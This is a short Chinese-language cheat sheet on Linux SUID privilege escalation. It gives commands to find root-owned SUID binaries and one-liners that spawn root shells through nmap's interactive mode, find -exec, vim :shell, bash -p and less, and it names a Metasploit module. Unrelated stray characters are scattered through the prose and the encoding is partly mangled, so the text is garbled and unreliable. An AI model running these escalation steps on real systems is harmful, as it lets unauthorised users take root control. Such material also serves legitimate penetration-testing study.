0x01 SUID
什么是suid春贸?通俗的理解為其他用戶執(zhí)行這個程序的時候可以用該程序所有者/組的權(quán)限泌类。
0x02 SUID提權(quán)
那么什么是suid提權(quán)呢主守?我理解的就是有個文件捡絮,它有s標(biāo)志,并且他輸入root战坤,那么我們運(yùn)行這個程序就可以有了root的權(quán)限曙强,并且這個程序還得能執(zhí)行命令,不然沒什么用處途茫,那么我們就能從普通用戶提升到了root權(quán)限了碟嘴。
0x03 常見的可用于suid提權(quán)的命令
Nmap
Vim
find
Bash
More
Less
Nano
cp
0x04 查找符合條件的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
0x05 詳細(xì)介紹
- nmap
老版的nmap(2.02-5.21)有相互的功能--interactive
nmap> !sh
sh-3.2# whoami
root
msf中也有相關(guān)的模塊
exploit/unix/local/setuid_nmap
- find
如果find以SUID權(quán)限運(yùn)行,所有通過find執(zhí)行的命令都會以root權(quán)限運(yùn)行囊卜。
touch test
find test -exec whoami \;
- vim
如果vim以SUID運(yùn)行臀防,就會繼承root用戶的權(quán)限眠菇,可以讀取系統(tǒng)中所有的文件
vim/vi
:shell
- bash
bash -p
># id
- less/more
less /etc/passwd
!/bin/sh
